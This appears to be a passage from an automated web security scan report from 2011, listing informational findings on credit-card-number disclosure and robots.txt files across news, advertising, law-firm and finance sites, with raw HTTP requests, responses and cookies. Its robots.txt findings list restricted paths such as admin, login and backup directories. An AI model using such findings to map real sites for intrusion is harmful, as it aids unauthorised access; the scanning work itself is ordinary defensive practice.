Host: cgiwsc.enhancedsitebuilder.com
Proxy-Connection: keep-alive
Referer: http://www.managedfuturespecialist.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 11:05:40 GMT
Server: Apache/2.0.63 (Debian) CM4all-ModComa/1.1(libcoma/2.6.13) JETServ/2.2.25 mod_jk2/2.0.4 mod_apreq2-20051231/2.6.0
Cache-Control: must-revalidate
P3P: CP="NOI COR CURa INT"
Content-Type: application/x-javascript; charset=UTF-8
Content-Length: 2133

// ----------------------------------------------------------------------------
if (typeof(getTopWindow) != "function") { getTopWindow = function() { return window; }; }
if (typeof(ACCESSIBLE_VERSION)
...[SNIP]...
----------------------------------
var rurl = new URL('http://' + appInfo.server + URL.jdecode("%2Fcgix%2FAppLoader.cls%2FAENDU0IN29GG%2F7008%2F25529%2Flanguage%253Aen%253Bcountry%253AUS%253B%3Fcc%3D0.3572320435196161"),true,true);
rurl.setParameter('s2','true',true);
loadScript('http://' + appInfo.server + '/cgix/concat-o-mat.cls?id=cgix.stage1');
loadScript(rurl.toExternalForm());

// ----------------------------
...[SNIP]...

24.2. http://graphics8.nytimes.com/css/0.1/screen/common/modules/scrollbox.css

Summary

Severity:   Information
Confidence:   Certain
Host:   http://graphics8.nytimes.com
Path:   /css/0.1/screen/common/modules/scrollbox.css

Issue detail

The following credit card number was disclosed in the response:

Request

GET /css/0.1/screen/common/modules/scrollbox.css HTTP/1.1
Host: graphics8.nytimes.com
Proxy-Connection: keep-alive
Referer: http://dealbook.nytimes.com/2011/05/09/private-equity-has-a-horse-in-this-race/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: RMID=27fdc70e4ff84dbef4b4b43a; news_people_toolbar=NO; nyt-recmod=1; nyt-nofb=0; __utmz=69104142.1305112069.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=69104142.1451073784.1305112061.1305112061.1305112061.1; UserPersNYTRS=RecentLastSearch=/sales/new-york-ny-usa/1000000-99000000-price&RecentSearch=For+Sale_New+York_NY_%241%2c000%2c000-%2499%2c000%2c000%5e%2fsales%2fnew-york-ny-usa%2f1000000-99000000-price; NYTMapState=MapState=map_default; rsi_segs=D08734_70008|D08734_72078|H07707_11017|H07707_11018|H07707_11028|H07707_11029|H07707_11030|H07707_11031|H07707_11044|H07707_11048|H07707_10638; WT_FPC=id=173.193.214.243-4039295808.30148852:lv=1305112816444:ss=1305112015513; adxcl=t*26edd=4e32303f:1305112022; adxcs=si=0:1|s*18a4b=0:1; nyt-m=D30DFD30595EF4324E4B50EE62114094&e=i.1306900800&t=i.20&v=i.1&l=l.15.313598328.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1&n=i.2&g=i.0&er=i.1304360120&vr=l.4.1.0.0.0&pr=l.4.10.0.0.0&vp=i.0&gf=l.20.313598328.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1

Response

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
ntCoent-length: 1182
Content-Type: text/css
Last-Modified: Wed, 31 Mar 2010 15:29:01 GMT
ETag: "49e-4bb36a3d"
Accept-Ranges: bytes
Cache-Control: private, max-age=78653
Date: Thu, 12 May 2011 11:03:14 GMT
Connection: close
Vary: Accept-Encoding
Content-Length: 1182

/*$Id: scrollbox.css 34463 2010-03-18 18:25:11Z donohoe $
/css/0.1/screen/common/modules/scrollbox.css
(c)2006 - 2009 The New York Times Company */

.scrollBox {
position: relative;
height: 160px;
padding-right: 20px;
overflow: hidde
...[SNIP]...

24.3. http://www.carlyle.com/Contact/item7607.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.carlyle.com
Path:   /Contact/item7607.html

Issue detail

The following credit card number was disclosed in the response:

Request

GET /Contact/item7607.html HTTP/1.1
Host: www.carlyle.com
Proxy-Connection: keep-alive
Referer: http://www.carlyle.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=186619067.604400709.1305200382.1305200382.1305200382.1; __utmb=186619067; __utmc=186619067; __utmz=186619067.1305200382.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none)

Response

HTTP/1.1 200 OK
Content-Length: 26064
Content-Type: text/html
Last-Modified: Mon, 09 May 2011 16:23:34 GMT
Accept-Ranges: bytes
ETag: "67b17c7165ecc1:523"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Thu, 12 May 2011 11:41:12 GMT

<html>
<head>
<meta http-equiv="content-type" content="text/html; charset=UTF-8" />
<meta name="Keywords" content=""/>
<meta name="Description" content=""/>
<meta content="no-cache" http-
...[SNIP]...
<br /> F +49 69-5050 65765 </div>
...[SNIP]...

25. Robots.txt file
There are 36 instances of this issue:

Issue background

The file robots.txt is used to give instructions to web robots, such as search engine crawlers, about locations within the web site which robots are allowed, or not allowed, to crawl and index.

The presence of a robots.txt file does not in itself present any kind of security vulnerability. However, it is often used to identify restricted or private areas of a site's contents. The information in the file may therefore help an attacker to map out the site's contents, especially if some of the locations identified are not linked from elsewhere in the site. If the application relies on robots.txt to protect access to these areas, and does not enforce proper access control over them, then this presents a serious vulnerability.

Issue remediation

The robots.txt file is not itself a security threat, and its correct use can represent good practice for non-security reasons. You should not assume that all web robots will honour the file's instructions. Rather, assume that attackers will pay close attention to any locations identified in the file. Do not rely on robots.txt to provide any kind of protection over unauthorised access.


25.1. http://ad.doubleclick.net/clk

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /clk

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: ad.doubleclick.net

Response

HTTP/1.0 200 OK
Server: DCLK-HttpSvr
Content-Type: text/plain
Content-Length: 101
Last-Modified: Thu, 18 Mar 2010 15:31:04 GMT
Date: Thu, 12 May 2011 11:01:15 GMT

User-Agent: AdsBot-Google
Disallow:

User-Agent: MSNPTC
Disallow:

User-agent: *
Disallow: /

25.2. http://ad.us.doubleclick.net/adj/ftcom.5887.ftfm/private-equity

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.us.doubleclick.net
Path:   /adj/ftcom.5887.ftfm/private-equity

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: ad.us.doubleclick.net

Response

HTTP/1.0 200 OK
Server: DCLK-HttpSvr
Content-Type: text/plain
Content-Length: 101
Last-Modified: Thu, 18 Mar 2010 15:31:04 GMT
Date: Thu, 12 May 2011 11:03:16 GMT

User-Agent: AdsBot-Google
Disallow:

User-Agent: MSNPTC
Disallow:

User-agent: *
Disallow: /

25.3. http://b.scorecardresearch.com/b

Summary

Severity:   Information
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /b

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: b.scorecardresearch.com

Response

HTTP/1.0 200 OK
Last-Modified: Wed, 06 Jan 2010 17:35:59 GMT
Content-Length: 28
Content-Type: text/plain
Expires: Fri, 13 May 2011 11:04:16 GMT
Date: Thu, 12 May 2011 11:04:16 GMT
Connection: close
Cache-Control: private, no-transform, max-age=86400
Server: CS

User-agent: *
Disallow: /

25.4. http://bs.serving-sys.com/BurstingPipe/adServer.bs

Summary

Severity:   Information
Confidence:   Certain
Host:   http://bs.serving-sys.com
Path:   /BurstingPipe/adServer.bs

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: bs.serving-sys.com

Response

HTTP/1.1 200 OK
Content-Type: text/plain
Last-Modified: Mon, 16 Jan 2006 20:19:44 GMT
Accept-Ranges: bytes
ETag: "0b02b30da1ac61:0"
P3P: CP="NOI DEVa OUR BUS UNI"
Date: Thu, 12 May 2011 11:03:16 GMT
Connection: close
Content-Length: 28

User-agent: *
Disallow: /

25.5. http://by.optimost.com/counter/553/-/129/event.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://by.optimost.com
Path:   /counter/553/-/129/event.js

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: by.optimost.com

Response

HTTP/1.0 200 OK
Server: Fast
Content-Type: text/plain
Content-Length: 26
Accept-Ranges: bytes
Last-Modified: Thu, 30 Sep 2010 23:09:18 GMT
Expires: Thu, 12 May 2011 11:03:16 GMT
Pragma: no-cache
Date: Thu, 12 May 2011 11:03:16 GMT
Connection: close

User-agent: *
Disallow: /

25.6. http://convctr.overture.com/images/cc/cc.gif

Summary

Severity:   Information
Confidence:   Certain
Host:   http://convctr.overture.com
Path:   /images/cc/cc.gif

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: convctr.overture.com

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 11:02:25 GMT
Server: Apache/1.3.37 (Unix) mod_ssl/2.8.28 OpenSSL/0.9.7a mod_perl/1.29
Last-Modified: Wed, 09 Jul 2008 01:24:35 GMT
ETag: "afc93b-1a-48741353"
Accept-Ranges: bytes
Content-Length: 26
Connection: close
Content-Type: text/plain

User-agent: *
Disallow: /

25.7. http://dealbook.nytimes.com/2011/05/09/private-equity-has-a-horse-in-this-race/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://dealbook.nytimes.com
Path:   /2011/05/09/private-equity-has-a-horse-in-this-race/

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: dealbook.nytimes.com

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 11:02:54 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Vary: Cookie
X-Pingback: http://dealbook.nytimes.com/xmlrpc.php
Content-Length: 122
Connection: close
Content-Type: text/plain; charset=utf-8

User-agent: *
Disallow:
sitemap: http://spiderbites.nytimes.com/sitemaps/dealbook.nytimes.com/dealbook_full_sitemap.xml.gz

25.8. http://ds.serving-sys.com/BurstingCachedScripts//SBTemplates_2_3_0/StdBanner.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ds.serving-sys.com
Path:   /BurstingCachedScripts//SBTemplates_2_3_0/StdBanner.js

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: ds.serving-sys.com

Response

HTTP/1.0 200 OK
Content-Type: text/plain
Last-Modified: Mon, 16 Jan 2006 13:19:41 GMT
Server: Microsoft-IIS/6.0
Date: Thu, 12 May 2011 11:03:34 GMT
Content-Length: 28
Connection: close
Accept-Ranges: bytes

User-agent: *
Disallow: /

25.9. http://engine.cmmeglobal.com/v1/page-view

Summary

Severity:   Information
Confidence:   Certain
Host:   http://engine.cmmeglobal.com
Path:   /v1/page-view

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: engine.cmmeglobal.com

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Accept-Ranges: bytes
ETag: W/"81-1286792296000"
Last-Modified: Mon, 11 Oct 2010 10:18:16 GMT
Content-Type: text/plain
Content-Length: 81
Date: Thu, 12 May 2011 11:03:18 GMT
Connection: keep-alive

# Disallow robots to index any part of our contents
User-agent: *
Disallow: /

25.10. http://feeds.feedburner.com/CrmRadar

Summary

Severity:   Information
Confidence:   Certain
Host:   http://feeds.feedburner.com
Path:   /CrmRadar

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: feeds.feedburner.com

Response

HTTP/1.0 200 OK
Content-Type: text/plain
Date: Thu, 12 May 2011 10:57:47 GMT
Expires: Thu, 12 May 2011 10:57:47 GMT
Cache-Control: private, max-age=0
X-Content-Type-Options: nosniff
X-XSS-Protection: 1; mode=block
Server: GSE

User-agent: *
Disallow: /~a/

25.11. http://generalatlantic.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://generalatlantic.com
Path:   /

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: generalatlantic.com

Response

HTTP/1.1 200 OK
Content-Length: 206
Content-Type: text/plain
Last-Modified: Thu, 30 Apr 2009 19:53:14 GMT
Accept-Ranges: bytes
ETag: "0f1284ccdc9c91:22f2"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Thu, 12 May 2011 11:00:44 GMT
Connection: close

# See http://www.robotstxt.org/wc/norobots.html for documentation on how to use the robots.txt file
#
# To ban all spiders from the entire site uncomment the next two lines:
# User-Agent: *
# Disall
...[SNIP]...

25.12. http://googleads.g.doubleclick.net/pagead/ads

Summary

Severity:   Information
Confidence:   Certain
Host:   http://googleads.g.doubleclick.net
Path:   /pagead/ads

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: googleads.g.doubleclick.net

Response

HTTP/1.0 200 OK
Content-Type: text/plain
Date: Thu, 12 May 2011 11:02:32 GMT
Server: cafe
Cache-Control: private
X-XSS-Protection: 1; mode=block

User-Agent: *
Allow: /ads/preferences/
Disallow: /
Noindex: /

25.13. http://graphics8.nytimes.com/css/blogs/3.1/screen/themes/dealbook/style.css

Summary

Severity:   Information
Confidence:   Certain
Host:   http://graphics8.nytimes.com
Path:   /css/blogs/3.1/screen/themes/dealbook/style.css

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: graphics8.nytimes.com

Response

HTTP/1.0 200 OK
Server: Sun-ONE-Web-Server/6.1
ntCoent-length: 512
Content-Type: text/html
Last-Modified: Wed, 29 Oct 2008 14:49:40 GMT
ETag: "200-49087804"
Cache-Control: private, max-age=478793
Date: Thu, 12 May 2011 11:02:58 GMT
Content-Length: 512
Connection: close

# robots.txt, www.nytimes.com 6/29/2006
#
User-agent: *
Disallow: /pages/college/
Disallow: /college/
Disallow: /library/
Disallow: /learning/
Disallow: /aponline/
Disallow: /reuters/
Disallow: /cnet/
...[SNIP]...

25.14. http://investmentfirmsdirect.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://investmentfirmsdirect.com
Path:   /

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: investmentfirmsdirect.com

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 11:05:30 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.11
Vary: Accept-Encoding,User-Agent
P3P: CP="CAO PSA OUR"
Content-Length: 67
Connection: close
Content-Type: text/html; charset=UTF-8

User-agent: *
Crawl-delay:20
Disallow: /click.php
Disallow: /ud.php

25.15. http://l.addthiscdn.com/live/t00/250lo.gif

Summary

Severity:   Information
Confidence:   Certain
Host:   http://l.addthiscdn.com
Path:   /live/t00/250lo.gif

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: l.addthiscdn.com

Response

HTTP/1.0 200 OK
Server: Apache
Last-Modified: Tue, 12 Apr 2011 11:05:10 GMT
ETag: "d71005-1b-4a0b6aa63c580"
Content-Type: text/plain; charset=UTF-8
Date: Thu, 12 May 2011 11:02:29 GMT
Content-Length: 27
Connection: close

User-agent: *
Disallow: *


25.16. http://media.ft.com/h/subs.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://media.ft.com
Path:   /h/subs.html

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: media.ft.com

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 11:03:18 GMT
Content-Length: 677
Content-Type: text/plain; charset=utf-8
ETag: "2a5-4c179977"
Last-Modified: Tue, 15 Jun 2010 15:17:11 GMT
Accept-Ranges: bytes
Server: Apache/1.3.37
p3p: policyref="/w3c/p3p.xml", CP="CAO DSP COR LAW CURa ADMa DEVa TAIa PSAa PSDa CONo OUR DELi BUS IND PHY ONL UNI COM NAV INT DEM PRE OTC"
Connection: close

User-agent: Googlebot-Mobile
Disallow: /search/
Disallow: /ftArticle
Disallow: /FTePaper
Disallow: /epaper
Disallow: /cms/s/8bb7fbd4-e176-11dd-afa0-0000779fd2ac.html
Disallow: /Common/

User-agent: Go
...[SNIP]...

25.17. http://pagead2.googlesyndication.com/pagead/imgad

Summary

Severity:   Information
Confidence:   Certain
Host:   http://pagead2.googlesyndication.com
Path:   /pagead/imgad

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: pagead2.googlesyndication.com

Response

HTTP/1.0 200 OK
Content-Type: text/plain
Date: Thu, 12 May 2011 11:01:28 GMT
Server: cafe
Cache-Control: private
X-XSS-Protection: 1; mode=block

User-Agent: *
Allow: /ads/preferences/
Disallow: /
Noindex: /

25.18. http://privatemoneytalk.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://privatemoneytalk.com
Path:   /

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: privatemoneytalk.com

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 11:02:48 GMT
Server: Apache mod_fcgid/2.3.6 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
X-Pingback: http://privatemoneytalk.com/xmlrpc.php
Set-Cookie: PHPSESSID=64459fc69468cd2019f66bace4c7174a; path=/
Set-Cookie: sbmg_footerShowAfter=1; expires=Fri, 11-May-2012 11:02:49 GMT; path=/
Connection: close
Content-Type: text/plain; charset=utf-8

User-agent: *
Disallow:

Sitemap: http://privatemoneytalk.com/sitemap.xml.gz

25.19. http://pubads.g.doubleclick.net/gampad/ads

Summary

Severity:   Information
Confidence:   Certain
Host:   http://pubads.g.doubleclick.net
Path:   /gampad/ads

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: pubads.g.doubleclick.net

Response

HTTP/1.0 200 OK
Content-Type: text/plain
Date: Thu, 12 May 2011 11:01:26 GMT
Server: cafe
Cache-Control: private
X-XSS-Protection: 1; mode=block

User-Agent: *
Allow: /ads/preferences/
Disallow: /
Noindex: /

25.20. http://www.beneschlaw.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.beneschlaw.com
Path:   /

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.beneschlaw.com

Response

HTTP/1.1 200 OK
Cache-Control: max-age=2592000
Content-Length: 637
Content-Type: text/plain
Last-Modified: Fri, 22 May 2009 19:57:02 GMT
Accept-Ranges: bytes
ETag: "fe9c567917dbc91:2a68"
Server: Microsoft-IIS/6.0
x-geoloc: 02
x-client: 000183
x-apptype: 01
x-prodtype: 01
x-public: 1
x-redirect: 0
x-occurrence: 01
x-server: EG-HUBRD-A73
X-UA-Compatible: IE=EmulateIE7
X-Powered-By: ASP.NET
Date: Thu, 12 May 2011 12:19:06 GMT
Connection: close
Set-Cookie: NSC_QPE-FHB7374_TibsfQspe=ffffffff09df180d45525d5f4f58455e445a4a423660;path=/

# STANDARD
User-agent: *
Disallow: /fc/
Disallow: /FirmConnect.aspx
Disallow: /Login.aspx
Disallow: /Logout.aspx
Disallow: /32/
Disallow: /1/
Disallow: /2/
Disallow: /3/
Disallow: /64/
Disa
...[SNIP]...

25.21. http://www.dmoc.com/sites/default/files/home-tetons.jpg

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.dmoc.com
Path:   /sites/default/files/home-tetons.jpg

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.dmoc.com

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 12:20:54 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
Last-Modified: Wed, 10 Dec 2008 20:12:19 GMT
ETag: "11878bdc-636-45db6e083aec0"
Accept-Ranges: bytes
Content-Length: 1590
Cache-Control: max-age=1209600
Expires: Thu, 26 May 2011 12:20:54 GMT
Connection: close
Content-Type: text/plain

# $Id: robots.txt,v 1.9.2.1 2008/12/10 20:12:19 goba Exp $
#
# robots.txt
#
# This file is to prevent the crawling and indexing of certain parts
# of your site by web crawlers and spiders run by sites
...[SNIP]...

25.22. http://www.facebook.com/plugins/like.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/like.php

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.facebook.com

Response

HTTP/1.0 200 OK
Content-Type: text/plain;charset=utf-8
X-FB-Server: 10.54.201.41
Connection: close
Content-Length: 2553

# Notice: if you would like to crawl Facebook you can
# contact us here: http://www.facebook.com/apps/site_scraping_tos.php
# to apply for white listing. Our general terms are available
# at http://ww
...[SNIP]...

25.23. http://www.ft.com/indepth/privateequity

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ft.com
Path:   /indepth/privateequity

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.ft.com

Response

HTTP/1.1 200 OK
ETag: "215-4d9aca31"
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR LAW CURa ADMa DEVa TAIa PSAa PSDa CONo OUR DELi BUS IND PHY ONL UNI COM NAV INT DEM PRE OTC"
Accept-Ranges: bytes
Content-Length: 533
Date: Thu, 12 May 2011 11:03:00 GMT
Connection: close
Last-Modified: Tue, 05 Apr 2011 07:52:17 GMT
Server: Apache/1.3.37
Content-Type: text/plain; charset=utf-8
Keep-Alive: timeout=1, max=119

User-agent: Googlebot-Mobile
Disallow: /

User-agent: Googlebot-News
Disallow: /FTePaper
Disallow: /epaper
Disallow: /cms/s/8bb7fbd4-e176-11dd-afa0-0000779fd2ac.html
Disallow: /Common/

User-agent: Go
...[SNIP]...

25.24. http://www.google-analytics.com/__utm.gif

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.google-analytics.com
Path:   /__utm.gif

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.google-analytics.com

Response

HTTP/1.0 200 OK
Content-Type: text/plain
Last-Modified: Mon, 10 Jan 2011 11:53:04 GMT
Date: Thu, 12 May 2011 11:00:56 GMT
Expires: Thu, 12 May 2011 11:00:56 GMT
Cache-Control: private, max-age=0
Vary: Accept-Encoding
X-Content-Type-Options: nosniff
Server: sffe
X-XSS-Protection: 1; mode=block

User-agent: *
Disallow: /siteopt.js
Disallow: /config.js

25.25. http://www.huroncapital.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.huroncapital.com
Path:   /

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.huroncapital.com

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 11:02:21 GMT
Server: Apache/1.3.37 (Unix)
AuthUser: -
Last-Modified: Tue, 22 Aug 2006 20:36:06 GMT
ETag: "3ffd2b-776-44eb6ab6"
Accept-Ranges: bytes
Content-Length: 1910
Content-Type: text/plain
Connection: close

#
# Any and all access by automated methods such as robots or spiders is
# restricted.
#
# Free license for such access is hereby granted to search engines which
# are freely open to the g
...[SNIP]...

25.26. http://www.managedfuturespecialist.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.managedfuturespecialist.com
Path:   /

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.managedfuturespecialist.com

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 11:05:33 GMT
Content-Type: text/plain
Connection: close
Server: Apache/Nginx/Varnish
Last-Modified: Fri, 01 Apr 2011 14:34:37 GMT
ETag: "b4db1e1c-18-49fdc4f32df80"
Cache-Control: max-age=14400, public
Expires: Thu, 12 May 2011 12:59:25 GMT
Content-Length: 24
Accept-Ranges: bytes
Age: 7567

User-agent: *
Disallow:

25.27. http://www.milbank.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.milbank.com
Path:   /

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.milbank.com

Response

HTTP/1.1 200 OK
Content-Length: 157
Content-Type: text/plain
Last-Modified: Tue, 05 Aug 2008 14:07:46 GMT
Accept-Ranges: bytes
ETag: "f73eaa24f7c81:23a"
Server: Microsoft-IIS/6.0
MicrosoftOfficeWebServer: 5.0_Pub
X-Powered-By: ASP.NET
Date: Thu, 12 May 2011 12:21:32 GMT
Connection: close

# Exclusions for milbank.com

# User-agent: *
# Disallow: /en/NewsEvents/RecentPressRel/Milbank_Advises_Genomma_Lab_Internacional_on_234_Million_IPO.htm

25.28. http://www.nytimes.com/adx/bin/adx_remote.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.nytimes.com
Path:   /adx/bin/adx_remote.html

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.nytimes.com

Response

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
Date: Thu, 12 May 2011 11:03:03 GMT
Content-length: 637
Content-type: text/plain
Set-cookie: RMID=2dff06a3406f4dcbbe6702e3; expires=Friday, 11-May-2012 11:03:03 GMT; path=/; domain=.nytimes.com
Last-modified: Mon, 26 Apr 2010 17:28:40 GMT
Accept-ranges: bytes
Connection: keep-alive

User-agent: *
Allow: /ads/public/
Disallow: /ads/
Disallow: /adx/bin/
Disallow: /aponline/
Disallow: /archives/
Disallow: /auth/
Disallow: /cnet/
Disallow: /college/
Disallow: /external/
Disallow: /fi
...[SNIP]...

25.29. http://www.opalgroup.net/google/ais2010.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.opalgroup.net
Path:   /google/ais2010.html

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.opalgroup.net

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 11:01:15 GMT
Server: Apache/2.2.6 (Unix)
Last-Modified: Mon, 03 May 2010 17:14:41 GMT
ETag: "3a4108-407-ba796240"
Accept-Ranges: bytes
Content-Length: 1031
Connection: close
Content-Type: text/plain; charset=ISO-8859-1

User-agent: *
Sitemap: http://www.opalgroup.net/sitemap.xml
Disallow: /playsite/
Disallow: /logaholic/
Disallow: /linkedin/
Disallow: /google/
Disallow: /mobile/
Disallow: /bing/
Disallow: /opalnew/
D
...[SNIP]...

25.30. http://www.pillsburylaw.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.pillsburylaw.com
Path:   /

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.pillsburylaw.com

Response

HTTP/1.1 200 OK
Content-Length: 186
Content-Type: text/plain
Content-Location: http://www.pillsburylaw.com/robots.txt
Last-Modified: Tue, 23 Mar 2010 16:27:52 GMT
Accept-Ranges: bytes
ETag: "81113c9a5caca1:b91"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Thu, 12 May 2011 12:22:03 GMT
Connection: close

User-agent: *
Disallow: /admin/
Disallow: /mobile/
Disallow: /pdf.cfm
Disallow: /topdf.cfm
Disallow: /vcard.cfm
Disallow: /printfriendly.cfm
sitemap: web_sitemap_c3564d4c.xml.gz

25.31. http://www.porterwright.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.porterwright.com
Path:   /

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.porterwright.com

Response

HTTP/1.1 200 OK
Content-Length: 107
Content-Type: text/plain
Last-Modified: Fri, 02 Jan 2009 18:48:56 GMT
Accept-Ranges: bytes
ETag: "05cdec3a6dc91:8a30"
Server: Microsoft-IIS/6.0
x-geoloc: 02
x-client: 000896
x-apptype: 01
x-prodtype: 01
x-public: 1
x-redirect: 0
x-occurrence: 01
x-server: EG-HUBRD-A68
X-UA-Compatible: IE=EmulateIE7
X-Powered-By: ASP.NET
Date: Thu, 12 May 2011 12:21:51 GMT
Connection: close
Set-Cookie: NSC_MC_QbvmXfjtt_IUUQ=ffffffff09d5f65e45525d5f4f58455e445a4a423660;path=/

User-agent: *
Disallow: /fc/
Disallow: /FirmConnect.aspx
Disallow: /Login.aspx
Disallow: /Logout.aspx

25.32. http://www.privateequityinfo.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.privateequityinfo.com
Path:   /

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.privateequityinfo.com

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 11:02:22 GMT
Server: Apache/2.2.3 (CentOS)
Last-Modified: Tue, 30 Nov 2010 21:37:36 GMT
ETag: "438038-111-4964bff40e800"
Accept-Ranges: bytes
Content-Length: 273
Connection: close
Content-Type: text/plain

User-agent: *
Disallow: /backup/
Disallow: /cgi-bin/
Disallow: /cp/
Disallow: /css/
Disallow: /e-spider/
Disallow: /editor/
Disallow: /grfx/
Disallow: /images/
Disallow: /js/
Disallow: /lib/
Disallow:
